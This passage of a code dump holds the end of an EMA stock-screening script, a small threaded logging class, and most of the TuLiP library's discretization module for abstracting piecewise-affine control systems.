calculate EMAs for each symbol print('Calculating EMAs...') for sym in candles: for period in EMA_PERIODS: iEMA = EMA([period]) lst_candles = candles[sym][:] for c in lst_candles: iEMA.add(c['close']) if sym not in ema_values: ema_values[sym] = {} ema_values[sym][period] = iEMA.v() # save filtered EMA results in txt files print('Saving filtered EMA results to txt files...') for sym in ema_values: ema_50 = ema_values[sym][50] ema_200 = ema_values[sym][200] price = prices[sym] entry = '' if price < ema_50: # save symbols trading below EMA (50) f = open('results/below_50.txt', 'a') entry = '%s: $%s\n' %(sym, round(price,3)) f.write(entry) elif price > ema_50 and price < ema_200: # save symbols trading above EMA(200) f = open('results/above_50_below_200.txt', 'a') entry = '%s: $%s\n' %(sym, round(price,3)) f.write(entry) elif price > ema_200: # save symbols trading above EMA(50) but below EMA(200) f = open('results/above_200.txt', 'a') entry = '%s: $%s\n' %(sym, round(price,3)) f.write(entry) f.close() del f # cleanup print('All done! Results saved in results folder.')
debug.py
import time import datetime import threading class Debugger: thread = None def __init__(self): self.error_log = 'error_log' self.debug_log = 'debug_log' self.error_file = None self.debug_file = None self.files_closing = False self.flush_thread = None def run(self): self.error_file = open(self.error_log, 'a+') self.debug_file = open(self.debug_log, 'a+') self.flush_thread = threading.Thread(target=self.output_flush, args=(10,), daemon=True) def output_flush(self, interval): time.sleep(interval) self.files_closing = True time.sleep(0.1) self.error_file.close() self.debug_file.close() self.error_file = open(self.error_log, 'a+') self.debug_file = open(self.debug_log, 'a+') self.files_closing = False def write(self, content, code): x = threading.Thread(target=self.safe_write, args=(content, code)) x.start() def safe_write(self, content, code): start_time = datetime.datetime.now() while self.files_closing: time.sleep(0.1) if (datetime.datetime.now() - start_time).seconds >= 5: with open('debugger_timeout') as f: f.write(f'Timeout at {start_time}, Log [' + ('LOG' if code == 0 else 'ERROR') + '] entry:\n'\ + content) return if code == self.DebugCode.LOG: self.debug_file.write(content + '\n') elif code == self.DebugCode.ERROR: self.error_file.write(content + '\n') return class DebugCode: LOG = 0 ERROR = 1
discretization.py
# Copyright (c) 2011-2016 by California Institute of Technology # Copyright (c) 2016 by The Regents of the University of Michigan # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions # are met: # # 1. Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # # 2. Redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in the # documentation and/or other materials provided with the distribution. # # 3. Neither the name of the copyright holder(s) nor the names of its # contributors may be used to endorse or promote products derived # from this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS # FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE # COPYRIGHT HOLDERS OR THE CONTRIBUTORS BE LIABLE FOR ANY DIRECT, # INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES # (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR # SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) # HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, # STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING # IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. # """ Algorithms related to discretization of continuous dynamics. See Also ======== L{find_controller} """ from __future__ import absolute_import from __future__ import division from __future__ import print_function import logging logger = logging.getLogger(__name__) import os import warnings import pprint from copy import deepcopy import multiprocessing as mp import numpy as np from scipy import sparse as sp import polytope as pc from polytope.plot import plot_partition, plot_transition_arrow from tulip import transys as trs from tulip.hybrid import LtiSysDyn, PwaSysDyn from .prop2partition import (PropPreservingPartition, pwa_partition, part2convex) from .feasible import is_feasible, solve_feasible from .plot import plot_ts_on_partition # inline imports: # # inline: import matplotlib.pyplot as plt debug = False class AbstractSwitched(object): """Abstraction of SwitchedSysDyn, with mode-specific and common info. Attributes: - ppp: merged partition, if any Preserves both propositions and dynamics - ts: common TS, if any - ppp2ts: map from C{ppp.regions} to C{ts.states} - modes: dict of {mode: AbstractPwa} - ppp2modes: map from C{ppp.regions} to C{modes[mode].ppp.regions} of the form: {mode: list} where C{list} has same indices as C{ppp.regions} and elements in each C{list} are indices of regions in each C{modes[mode].ppp.regions}. type: dict Each partition corresponds to some mode. (for switched systems) In each mode a L{PwaSysDyn} is active. """ def __init__( self, ppp=None, ts=None, ppp2ts=None, modes=None, ppp2modes=None ): if modes is None: modes = dict() self.ppp = ppp self.ts = ts self.ppp2ts = ppp2ts self.modes = modes self.ppp2modes = ppp2modes def __str__(self): s = 'Abstraction of switched system\n' s += str('common PPP:\n') + str(self.ppp) s += str('common ts:\n') + str(self.ts) for mode, ab in self.modes.items(): s += 'mode: ' + str(mode) s += ', with abstraction:\n' + str(ab) return s def ppp2pwa(self, mode, i): """Return original C{Region} containing C{Region} C{i} in C{mode}. @param mode: key of C{modes} @param i: Region index in common partition C{ppp.regions}. @return: tuple C{(j, region)} of: - index C{j} of C{Region} and - C{Region} object in C{modes[mode].ppp.regions} """ region_idx = self.ppp2modes[mode][i] ab = self.modes[mode] return ab.ppp2pwa(region_idx) def ppp2sys(self, mode, i): """Return index of active PWA subsystem in C{mode}, @param mode: key of C{modes} @param i: Region index in common partition C{ppp.regions}. @return: tuple C{(j, subsystem)} of: - index C{j} of PWA C{subsystem} - L{LtiSysDyn} object C{subsystem} """ region_idx = self.ppp2modes[mode][i] ab = self.modes[mode] return ab.ppp2sys(region_idx) def plot(self, show_ts=False, only_adjacent=False): """Plot mode partitions and merged partition, if one exists. For details see L{AbstractPwa.plot}. """ axs = [] color_seed = 0 # merged partition exists ? if self.ppp is not None: for mode in self.modes: env_mode, sys_mode = mode edge_label = {'env_actions':env_mode, 'sys_actions':sys_mode} ax = _plot_abstraction( self, show_ts=False, only_adjacent=False, color_seed=color_seed ) plot_ts_on_partition( self.ppp, self.ts, self.ppp2ts, edge_label, only_adjacent, ax ) axs += [ax] # plot mode partitions for mode, ab in self.modes.items(): ax = ab.plot(show_ts, only_adjacent, color_seed) ax.set_title('Abstraction for mode: ' + str(mode)) axs += [ax] #if isinstance(self.ts, dict): # for ts in self.ts: # ax = ts.plot() # axs += [ax] return axs class AbstractPwa(object): """Discrete abstraction of PWA dynamics, with attributes: - ppp: Partition into Regions. Each Region corresponds to a discrete state of the abstraction type: L{PropPreservingPartition} - ts: Finite transition system abstracting the continuous system. Each state corresponds to a Region in C{ppp.regions}. It can be fed into discrete synthesis algorithms. type: L{FTS} - ppp2ts: bijection between C{ppp.regions} and C{ts.states}. Has common indices with C{ppp.regions}. Elements are states in C{ts.states}. (usually each state is a str) type: list of states - pwa: system dynamics type: L{PwaSysDyn} - pwa_ppp: partition preserving both: - propositions and - domains of PWA subsystems Used for non-conservative planning. If just L{LtiSysDyn}, then the only difference of C{pwa_ppp} from C{orig_ppp} is convexification. type: L{PropPreservingPartition} - orig_ppp: partition preserving only propositions i.e., agnostic of dynamics type: L{PropPreservingPartition} - disc_params: parameters used in discretization that should be passed to the controller refinement to ensure consistency type: dict If any of the above is not given, then it is initialized to None. Notes ===== 1. There could be some redundancy in ppp and ofts, in that they are both decorated with propositions. This might be useful to keep each of them as functional units on their own (possible to change later). 2. The 'Pwa' in L{AbstractPwa} includes L{LtiSysDyn} as a special case. """ def __init__( self, ppp=None, ts=None, ppp2ts=None, pwa=None, pwa_ppp=None, ppp2pwa=None, ppp2sys=None, orig_ppp=None, ppp2orig=None, disc_params=None ): if disc_params is None: disc_params = dict() self.ppp = ppp self.ts = ts self.ppp2ts = ppp2ts self.pwa = pwa self.pwa_ppp = pwa_ppp self._ppp2pwa = ppp2pwa self._ppp2sys = ppp2sys self.orig_ppp = orig_ppp self._ppp2orig = ppp2orig # original_regions -> pwa_ppp # ppp2orig -> ppp2pwa_ppp # ppp2pwa -> ppp2pwa_sys self.disc_params = disc_params def __str__(self): s = str(self.ppp) s += str(self.ts) s += 30 * '-' + '\n' s += 'Map PPP Regions ---> TS states:\n' s += self._ppp2other_str(self.ppp2ts) + '\n' s += 'Map PPP Regions ---> PWA PPP Regions:\n' s += self._ppp2other_str(self._ppp2pwa) + '\n' s += 'Map PPP Regions ---> PWA Subsystems:\n' s += self._ppp2other_str(self._ppp2sys) + '\n' s += 'Map PPP Regions ---> Original PPP Regions:\n' s += self._ppp2other_str(self._ppp2orig) + '\n' s += 'Discretization Options:\n\t' s += pprint.pformat(self.disc_params) +'\n' return s def ts2ppp(self, state): region_index = self.ppp2ts.index(state) region = self.ppp[region_index] return (region_index, region) def ppp2trans(self, region_index): """Return the transition set constraint and active subsystem, for non-conservative planning. """ reg_idx, pwa_region = self.ppp2pwa(region_index) sys_idx, sys = self.ppp2sys(region_index) return pwa_region, sys def ppp2pwa(self, region_index): """Return dynamics and predicate-preserving region and its index for PWA subsystem active in given region. The returned region is the C{trans_set} used for non-conservative planning. @param region_index: index in C{ppp.regions}. @rtype: C{(i, pwa.pwa_ppp[i])} """ j = self._ppp2pwa[region_index] pwa_region = self.pwa_ppp[j] return (j, pwa_region) def ppp2sys(self, region_index): """Return index and PWA subsystem active in indexed region. Semantics: j-th sub-system is active in i-th Region, where C{j = ppp2pwa[i]} @param region_index: index in C{ppp.regions}. @rtype: C{(i, pwa.list_subsys[i])} """ # LtiSysDyn ? if self._ppp2sys is None: return (0, self.pwa) subsystem_idx = self._ppp2sys[region_index] subsystem = self.pwa.list_subsys[subsystem_idx] return (subsystem_idx, subsystem) def ppp2orig(self, region_index): """Return index and region of original partition. The original partition is w/o any dynamics, not even the PWA domains, only the polytopic predicates. @param region_index: index in C{ppp.regions}. @rtype: C{(i, orig_ppp.regions[i])} """ j = self._ppp2orig[region_index] orig_region = self.orig_ppp[j] return (j, orig_region) def _ppp2other_str(self, ppp2other): if ppp2other is None: return '' s = '' for i, other in enumerate(ppp2other): s += '\t\t' + str(i) + ' -> ' + str(other) + '\n' return s def _debug_str_(self): s = str(self.ppp) s += str(self.ts) s += '(PWA + Prop)-Preserving Partition' s += str(self.pwa_ppp) s += 'Original Prop-Preserving Partition' s += str(self.orig_ppp) return s def plot(self, show_ts=False, only_adjacent=False, color_seed=None): """Plot partition and optionally feasible transitions. @param show_ts: plot feasible transitions on partition @type show_ts: bool @param only_adjacent: plot feasible transitions only between adjacent regions. This reduces clutter, but if horizon > 1 and not all horizon used, then some transitions could be hidden. @param only_adjacent: bool """ ax = _plot_abstraction(self, show_ts, only_adjacent, color_seed) return ax def verify_transitions(self): logger.info('verifying transitions...') for from_state, to_state in self.ts.transitions(): i, from_region = self.ts2ppp(from_state) j, to_region = self.ts2ppp(to_state) trans_set, sys = self.ppp2trans(i) params = {'N', 'close_loop', 'use_all_horizon'} disc_params = {k:v for k,v in self.disc_params.items() if k in params} s0 = solve_feasible(from_region, to_region, sys, trans_set=trans_set, **disc_params) msg = str(i) + ' ---> ' + str(j) if not from_region <= s0: logger.error('incorrect transition: ' + msg) isect = from_region.intersect(s0) ratio = isect.volume /from_region.volume logger.error('intersection volume: ' + str(ratio) + ' %') else: logger.info('correct transition: ' + msg) def _plot_abstraction(ab, show_ts, only_adjacent, color_seed): if ab.ppp is None or ab.ts is None: warnings.warn('Either ppp or ts is None.') return if show_ts: ts = ab.ts ppp2ts = ab.ppp2ts else: ts = None ppp2ts = None ax = ab.ppp.plot( ts, ppp2ts, only_adjacent=only_adjacent, color_seed=color_seed ) #ax = self.ts.plot() return ax def discretize( part, ssys, N=10, min_cell_volume=0.1, closed_loop=True, conservative=False, max_num_poly=5, use_all_horizon=False, trans_length=1, remove_trans=False, abs_tol=1e-7, plotit=False, save_img=False, cont_props=None, plot_every=1, simu_type='bi' ): """Refine the partition via bisimulation or dual-simulation algorithms, and establish transitions based on reachability analysis. Reference ========= U{[NOTM12] <https://tulip-control.sourceforge.io/doc/bibliography.html#notm12>} See Also ======== L{prop2partition.pwa_partition}, L{prop2partition.part2convex} @param part: L{PropPreservingPartition} object @param ssys: L{LtiSysDyn} or L{PwaSysDyn} object @param N: horizon length @param min_cell_volume: the minimum volume of cells in the resulting partition. @param closed_loop: boolean indicating whether the `closed loop` algorithm should be used. default True. @param conservative: if true, force sequence in reachability analysis to stay inside starting cell. If false, safety is ensured by keeping the sequence inside a convexified version of the original proposition preserving cell. @param max_num_poly: maximum number of polytopes in a region to use in reachability analysis. @param use_all_horizon: in closed loop algorithm: if we should look for reachability also in less than N steps. @param trans_length: the number of polytopes allowed to cross in a transition. a value of 1 checks transitions only between neighbors, a value of 2 checks neighbors of neighbors and so on. @param remove_trans: if True, remove found transitions between non-neighbors. @param abs_tol: maximum volume for an "empty" polytope @param plotit: plot partitioning as it evolves @type plotit: boolean, default = False @param save_img: save snapshots of partitioning to PDF files, requires plotit=True @type save_img: boolean, default = False @param cont_props: continuous propositions to plot @type cont_props: list of C{Polytope} @param simu_type: if 'bi', use bisimulation partition; if 'dual', use dual-simulation partition @type simu_type: string, default = 'bi' @rtype: L{AbstractPwa} """ if simu_type == 'bi': AbstractPwa = _discretize_bi( part, ssys, N, min_cell_volume, closed_loop, conservative, max_num_poly, use_all_horizon, trans_length, remove_trans, abs_tol, plotit, save_img, cont_props, plot_every) elif simu_type == 'dual': AbstractPwa = _discretize_dual( part, ssys, N, min_cell_volume, closed_loop, conservative, max_num_poly, use_all_horizon, trans_length, remove_trans, abs_tol, plotit, save_img, cont_props, plot_every) else: raise ValueError( 'Unknown simulation type: "{st}"'.format( st=simu_type)) return AbstractPwa def _discretize_bi( part, ssys, N=10, min_cell_volume=0.1, closed_loop=True, conservative=False, max_num_poly=5, use_all_horizon=False, trans_length=1, remove_trans=False, abs_tol=1e-7, plotit=False, save_img=False, cont_props=None, plot_every=1 ): """Refine the partition and establish transitions based on reachability analysis. Use bi-simulation algorithm. Reference ========= 1. U{[NOTM12] <https://tulip-control.sourceforge.io/doc/bibliography.html#notm12>} 2. Wagenmaker, A. J.; Ozay, N. "A Bisimulation-like Algorithm for Abstracting Control Systems." 54th Annual Allerton Conference on CCC 2016 See Also ======== L{prop2partition.pwa_partition}, L{prop2partition.part2convex} @param part: L{PropPreservingPartition} object @param ssys: L{LtiSysDyn} or L{PwaSysDyn} object @param N: horizon length @param min_cell_volume: the minimum volume of cells in the resulting partition. @param closed_loop: boolean indicating whether the `closed loop` algorithm should be used. default True. @param conservative: if true, force sequence in reachability analysis to stay inside starting cell. If false, safety is ensured by keeping the sequence inside a convexified version of the original proposition preserving cell. @param max_num_poly: maximum number of polytopes in a region to use in reachability analysis. @param use_all_horizon: in closed loop algorithm: if we should look for reachability also in less than N steps. @param trans_length: the number of polytopes allowed to cross in a transition. a value of 1 checks transitions only between neighbors, a value of 2 checks neighbors of neighbors and so on. @param remove_trans: if True, remove found transitions between non-neighbors. @param abs_tol: maximum volume for an "empty" polytope @param plotit: plot partitioning as it evolves @type plotit: boolean, default = False @param save_img: save snapshots of partitioning to PDF files, requires plotit=True @type save_img: boolean, default = False @param cont_props: continuous propositions to plot @type cont_props: list of C{Polytope} @rtype: L{AbstractPwa} """ start_time = os.times()[0] orig_ppp = part min_cell_volume = (min_cell_volume /np.finfo(np.double).eps *np.finfo(np.double).eps) ispwa = isinstance(ssys, PwaSysDyn) islti = isinstance(ssys, LtiSysDyn) if ispwa: (part, ppp2pwa, part2orig) = pwa_partition(ssys, part) else: part2orig = range(len(part)) # Save original polytopes, require them to be convex if conservative: orig_list = None orig = [0] else: (part, new2old) = part2convex(part) # convexify part2orig = [part2orig[i] for i in new2old] # map new regions to pwa subsystems if ispwa: ppp2pwa = [ppp2pwa[i] for i in new2old] remove_trans = False # already allowed in nonconservative orig_list = [] for poly in part: if len(poly) == 0: orig_list.append(poly.copy()) elif len(poly) == 1: orig_list.append(poly[0].copy()) else: raise Exception("discretize: " "problem in convexification") orig = list(range(len(orig_list))) # Cheby radius of disturbance set # (defined within the loop for pwa systems) if islti: if len(ssys.E) > 0: rd = ssys.Wset.chebR else: rd = 0. # Initialize matrix for pairs to check IJ = part.adj.copy() IJ = IJ.todense() IJ = np.array(IJ) logger.debug("\n Starting IJ: \n" + str(IJ) ) # next line omitted in discretize_overlap IJ = reachable_within(trans_length, IJ, np.array(part.adj.todense()) ) # Initialize output num_regions = len(part) transitions = np.zeros( [num_regions, num_regions], dtype = int ) sol = deepcopy(part.regions) adj = part.adj.copy() adj = adj.todense() adj = np.array(adj) # next 2 lines omitted in discretize_overlap if ispwa: subsys_list = list(ppp2pwa) else: subsys_list = None ss = ssys # init graphics if plotit: try: import matplotlib.pyplot as plt plt.ion() fig, (ax1, ax2) = plt.subplots(1, 2) ax1.axis('scaled') ax2.axis('scaled') file_extension = 'pdf' except: logger.error('failed to import matplotlib') plt = None else: plt = None iter_count = 0 # List of how many "new" regions # have been created for each region # and a list of original number of neighbors #num_new_reg = np.zeros(len(orig_list)) #num_orig_neigh = np.sum(adj, axis=1).flatten() - 1 progress = list() # Do the abstraction while np.sum(IJ) > 0: ind = np.nonzero(IJ) # i,j swapped in discretize_overlap i = ind[1][0] j = ind[0][0] IJ[j, i] = 0 si = sol[i] sj = sol[j] si_tmp = deepcopy(si) sj_tmp = deepcopy(sj) if ispwa: ss = ssys.list_subsys[subsys_list[i]] if len(ss.E) > 0: rd, xd = pc.cheby_ball(ss.Wset) else: rd = 0. if conservative: # Don't use trans_set trans_set = None else: # Use original cell as trans_set trans_set = orig_list[orig[i]] S0 = solve_feasible( si, sj, ss, N, closed_loop, use_all_horizon, trans_set, max_num_poly ) msg = '\n Working with partition cells: {i}, {j}'.format(i=i, j=j) logger.info(msg) msg = '\t{i} (#polytopes = {num}), and:\n'.format(i=i, num=len(si)) msg += '\t{j} (#polytopes = {num})\n'.format(j=j, num=len(sj)) if ispwa: msg += '\t with active subsystem: ' msg += '{sys}\n'.format(sys=subsys_list[i]) msg += '\t Computed reachable set S0 with volume: ' msg += '{vol}\n'.format(vol=S0.volume) logger.debug(msg) #logger.debug('si \cap s0') isect = si.intersect(S0) vol1 = isect.volume risect, xi = pc.cheby_ball(isect) #logger.debug('si \ s0') diff = si.diff(S0) vol2 = diff.volume rdiff, xd = pc.cheby_ball(diff) # if pc.is_fulldim(pc.Region([isect]).intersect(diff)): # logging.getLogger('tulip.polytope').setLevel(logging.DEBUG) # diff = pc.mldivide(si, S0, save=True) # # ax = S0.plot() # ax.axis([0.0, 1.0, 0.0, 2.0]) # ax.figure.savefig('./img/s0.pdf') # # ax = si.plot() # ax.axis([0.0, 1.0, 0.0, 2.0]) # ax.figure.savefig('./img/si.pdf') # # ax = isect.plot() # ax.axis([0.0, 1.0, 0.0, 2.0]) # ax.figure.savefig('./img/isect.pdf') # # ax = diff.plot() # ax.axis([0.0, 1.0, 0.0, 2.0]) # ax.figure.savefig('./img/diff.pdf') # # ax = isect.intersect(diff).plot() # ax.axis([0.0, 1.0, 0.0, 2.0]) # ax.figure.savefig('./img/diff_cap_isect.pdf') # # logger.error('Intersection \cap Difference != \emptyset') # # assert(False) if vol1 <= min_cell_volume: logger.warning('\t too small: si \cap Pre(sj), ' 'so discard intersection') if vol1 <= min_cell_volume and isect: logger.warning('\t discarded non-empty intersection: ' 'consider reducing min_cell_volume') if vol2 <= min_cell_volume: logger.warning('\t too small: si \ Pre(sj), so not reached it') # We don't want our partitions to be smaller than the disturbance set # Could be a problem since cheby radius is calculated for smallest # convex polytope, so if we have a region we might throw away a good # cell. if (vol1 > min_cell_volume) and (risect > rd) and \ (vol2 > min_cell_volume) and (rdiff > rd): # Make sure new areas are Regions and add proposition lists if len(isect) == 0: isect = pc.Region([isect], si.props) else: isect.props = si.props.copy() if len(diff) == 0: diff = pc.Region([diff], si.props) else: diff.props = si.props.copy() # replace si by intersection (single state) isect_list = pc.separate(isect) sol[i] = isect_list[0] # cut difference into connected pieces difflist = pc.separate(diff) difflist += isect_list[1:] # n_isect = len(isect_list) -1 num_new = len(difflist) # add each piece, as a new state for region in difflist: sol.append(region) # keep track of PWA subsystems map to new states if ispwa: subsys_list.append(subsys_list[i]) n_cells = len(sol) new_idx = range(n_cells-1, n_cells-num_new-1, -1) """Update transition matrix""" transitions = np.pad(transitions, (0,num_new), 'constant') transitions[i, :] = np.zeros(n_cells) for r in new_idx: #transitions[:, r] = transitions[:, i] # All sets reachable from start are reachable from both part's # except possibly the new part transitions[i, r] = 0 transitions[j, r] = 0 # sol[j] is reachable from intersection of sol[i] and S0 if i != j: transitions[j, i] = 1 # sol[j] is reachable from each piece os S0 \cap sol[i] #for k in range(n_cells-n_isect-2, n_cells): # transitions[j, k] = 1 """Update adjacency matrix""" old_adj = np.nonzero(adj[i, :])[0] # reset new adjacencies adj[i, :] = np.zeros([n_cells -num_new]) adj[:, i] = np.zeros([n_cells -num_new]) adj[i, i] = 1 adj = np.pad(adj, (0, num_new), 'constant') for r in new_idx: adj[i, r] = 1 adj[r, i] = 1 adj[r, r] = 1 if not conservative: orig = np.hstack([orig, orig[i]]) # adjacencies between pieces of isect and diff for r in new_idx: for k in new_idx: if r is k: continue if pc.is_adjacent(sol[r], sol[k]): adj[r, k] = 1 adj[k, r] = 1 msg = '' if logger.getEffectiveLevel() <= logging.DEBUG: msg += '\t\n Adding states {i} and '.format(i=i) for r in new_idx: msg += '{r} and '.format(r=r) msg += '\n' logger.debug(msg) for k in np.setdiff1d(old_adj, [i,n_cells-1]): # Every "old" neighbor must be the neighbor # of at least one of the new if pc.is_adjacent(sol[i], sol[k]): adj[i, k] = 1 adj[k, i] = 1 elif remove_trans and (trans_length == 1): # Actively remove transitions between non-neighbors transitions[i, k] = 0 transitions[k, i] = 0 for r in new_idx: if pc.is_adjacent(sol[r], sol[k]): adj[r, k] = 1 adj[k, r] = 1 elif remove_trans and (trans_length == 1): # Actively remove transitions between non-neighbors transitions[r, k] = 0 transitions[k, r] = 0 """Update IJ matrix""" IJ = np.pad(IJ, (0,num_new), 'constant') adj_k = reachable_within(trans_length, adj, adj) sym_adj_change(IJ, adj_k, transitions, i) for r in new_idx: sym_adj_change(IJ, adj_k, transitions, r) if logger.getEffectiveLevel() <= logging.DEBUG: msg = '\n\n Updated adj: \n{adj}'.format(adj=adj) msg += '\n\n Updated trans: \n{trans}'.format(trans= transitions) msg += '\n\n Updated IJ: \n{IJ}'.format(IJ=IJ) logger.debug(msg) logger.info('Divided region: {i}\n'.format(i=i)) elif vol2 < abs_tol: logger.info('Found: {i} ---> {j}\n'.format(i=i, j=j)) transitions[j,i] = 1 else: if logger.level <= logging.DEBUG: msg = '\t Unreachable: {i} --X--> {j}\n'.format(i=i, j=j) msg += '\t\t diff vol: {vol2}\n'.format(vol2=vol2) msg += '\t\t intersect vol: {vol1}\n'.format(vol1=vol1) logger.debug(msg) else: logger.info('\t unreachable\n') transitions[j,i] = 0 # check to avoid overlapping Regions if debug: tmp_part = PropPreservingPartition( domain=part.domain, regions=sol, adj=sp.lil_matrix(adj), prop_regions=part.prop_regions ) assert(tmp_part.is_partition() ) n_cells = len(sol) progress_ratio = 1 - float(np.sum(IJ) ) /n_cells**2 progress += [progress_ratio] msg = '\t total # polytopes: {n_cells}\n'.format(n_cells=n_cells) msg += '\t progress ratio: {pr}\n'.format(pr=progress_ratio) logger.info(msg) iter_count += 1 # no plotting ? if not plotit: continue if plt is None or plot_partition is None: continue if iter_count % plot_every != 0: continue tmp_part = PropPreservingPartition( domain=part.domain, regions=sol, adj=sp.lil_matrix(adj), prop_regions=part.prop_regions ) # plot pair under reachability check ax2.clear() si_tmp.plot(ax=ax2, color='green') sj_tmp.plot(ax2, color='red', hatch='o', alpha=0.5) plot_transition_arrow(si_tmp, sj_tmp, ax2) S0.plot(ax2, color='none', hatch='/', alpha=0.3) fig.canvas.draw() # plot partition ax1.clear() plot_partition(tmp_part, transitions.T, ax=ax1, color_seed=23) # plot dynamics ssys.plot(ax1, show_domain=False) # plot hatched continuous propositions part.plot_props(ax1) fig.canvas.draw() # scale view based on domain, # not only the current polytopes si, sj l,u = part.domain.bounding_box ax2.set_xlim(l[0,0], u[0,0]) ax2.set_ylim(l[1,0], u[1,0]) if save_img: fname = 'movie' +str(iter_count).zfill(3) fname += '.' + file_extension fig.savefig(fname, dpi=250) plt.pause(1) new_part = PropPreservingPartition( domain=part.domain, regions=sol, adj=sp.lil_matrix(adj), prop_regions=part.prop_regions ) # check completeness of adjacency matrix if debug: tmp_part = deepcopy(new_part) tmp_part.compute_adj() # Generate transition system and add transitions ofts = trs.FTS() adj = sp.lil_matrix(transitions.T) n = adj.shape[0] ofts_states = range(n) ofts.states.add_from(ofts_states) ofts.transitions.add_adj(adj, ofts_states) # Decorate TS with state labels atomic_propositions = set(part.prop_regions) ofts.atomic_propositions.add_from(atomic_propositions) for state, region in zip(ofts_states, sol): state_prop = region.props.copy() ofts.states.add(state, ap=state_prop) param = { 'N':N, 'trans_length':trans_length, 'closed_loop':closed_loop, 'conservative':conservative, 'use_all_horizon':use_all_horizon, 'min_cell_volume':min_cell_volume, 'max_num_poly':max_num_poly } ppp2orig = [part2orig[x] for x in orig] end_time = os.times()[0] msg = 'Total abstraction time: {time}[sec]'.format(time= end_time - start_time) print(msg) logger.info(msg) if save_img and plt is not None: fig, ax = plt.subplots(1, 1) plt.plot(progress) ax.set_xlabel('iteration') ax.set_ylabel('progress ratio') ax.figure.savefig('progress.pdf') return AbstractPwa( ppp=new_part, ts=ofts, ppp2ts=ofts_states, pwa=ssys, pwa_ppp=part, ppp2pwa=orig, ppp2sys=subsys_list, orig_ppp=orig_ppp, ppp2orig=ppp2orig, disc_params=param ) def _discretize_dual( part, ssys, N=10, min_cell_volume=0.1, closed_loop=True, conservative=False, max_num_poly=5, use_all_horizon=False, trans_length=1, remove_trans=False, abs_tol=1e-7, plotit=False, save_img=False, cont_props=None, plot_every=1 ): """Refine the partition and establish transitions based on reachability analysis. Use dual-simulation algorithm. Reference ========= 1. U{[NOTM12] <https://tulip-control.sourceforge.io/doc/bibliography.html#notm12>} 2. Wagenmaker, A. J.; Ozay, N. "A Bisimulation-like Algorithm for Abstracting Control Systems." 54th Annual Allerton Conference on CCC 2016 See Also ======== L{prop2partition.pwa_partition}, L{prop2partition.part2convex} @param part: L{PropPreservingPartition} object @param ssys: L{LtiSysDyn} or L{PwaSysDyn} object @param N: horizon length @param min_cell_volume: the minimum volume of cells in the resulting partition. @param closed_loop: boolean indicating whether the `closed loop` algorithm should be used. default True. @param conservative: if true, force sequence in reachability analysis to stay inside starting cell. If false, safety is ensured by keeping the sequence inside a convexified version of the original proposition preserving cell. @param max_num_poly: maximum number of polytopes in a region to use in reachability analysis. @param use_all_horizon: in closed loop algorithm: if we should look for reachability also in less than N steps. @param trans_length: the number of polytopes allowed to cross in a transition. a value of 1 checks transitions only between neighbors, a value of 2 checks neighbors of neighbors and so on. @param remove_trans: if True, remove found transitions between non-neighbors. @param abs_tol: maximum volume for an "empty" polytope @param plotit: plot partitioning as it evolves @type plotit: boolean, default = False @param save_img: save snapshots of partitioning to PDF files, requires plotit=True @type save_img: boolean, default = False @param cont_props: continuous propositions to plot @type cont_props: list of C{Polytope} @param simu_type: flag used to choose abstraction algorithm (bisimulation or dual-simulation). @type simu_type: string, 'bi' or 'dual' default = 'bi' @rtype: L{AbstractPwa} """ start_time = os.times()[0] orig_ppp = part min_cell_volume = (min_cell_volume /np.finfo(np.double).eps *np.finfo(np.double).eps) ispwa = isinstance(ssys, PwaSysDyn) islti = isinstance(ssys, LtiSysDyn) if ispwa: (part, ppp2pwa, part2orig) = pwa_partition(ssys, part) else: part2orig = range(len(part)) # Save original polytopes, require them to be convex if conservative: orig_list = None orig = [0] else: (part, new2old) = part2convex(part) # convexify part2orig = [part2orig[i] for i in new2old] # map new regions to pwa subsystems if ispwa: ppp2pwa = [ppp2pwa[i] for i in new2old] remove_trans = False # already allowed in nonconservative orig_list = [] for poly in part: if len(poly) == 0: orig_list.append(poly.copy()) elif len(poly) == 1: orig_list.append(poly[0].copy()) else: raise Exception("discretize: " "problem in convexification") orig = list(range(len(orig_list))) # Cheby radius of disturbance set # (defined within the loop for pwa systems) if islti: if len(ssys.E) > 0: rd = ssys.Wset.chebR else: rd = 0. # Initialize matrix for pairs to check IJ = part.adj.copy() IJ = IJ.todense() IJ = np.array(IJ) logger.debug("\n Starting IJ: \n" + str(IJ) ) # next line omitted in discretize_overlap IJ = reachable_within(trans_length, IJ, np.array(part.adj.todense())) # Initialize output num_regions = len(part) transitions = np.zeros( [num_regions, num_regions], dtype = int ) sol = deepcopy(part.regions) adj = part.adj.copy() adj = adj.todense() adj = np.array(adj) # next 2 lines omitted in discretize_overlap if ispwa: subsys_list = list(ppp2pwa) else: subsys_list = None ss = ssys # init graphics if plotit: try: import matplotlib.pyplot as plt plt.ion() fig, (ax1, ax2) = plt.subplots(1, 2) ax1.axis('scaled') ax2.axis('scaled') file_extension = 'pdf' except: logger.error('failed to import matplotlib') plt = None else: plt = None iter_count = 0 # List of how many "new" regions # have been created for each region # and a list of original number of neighbors #num_new_reg = np.zeros(len(orig_list)) #num_orig_neigh = np.sum(adj, axis=1).flatten() - 1 progress = list() # Do the abstraction while np.sum(IJ) > 0: ind = np.nonzero(IJ) # i,j swapped in discretize_overlap i = ind[1][0] j = ind[0][0] IJ[j, i] = 0 si = sol[i] sj = sol[j] si_tmp = deepcopy(si) sj_tmp = deepcopy(sj) #num_new_reg[i] += 1 #print(num_new_reg) if ispwa: ss = 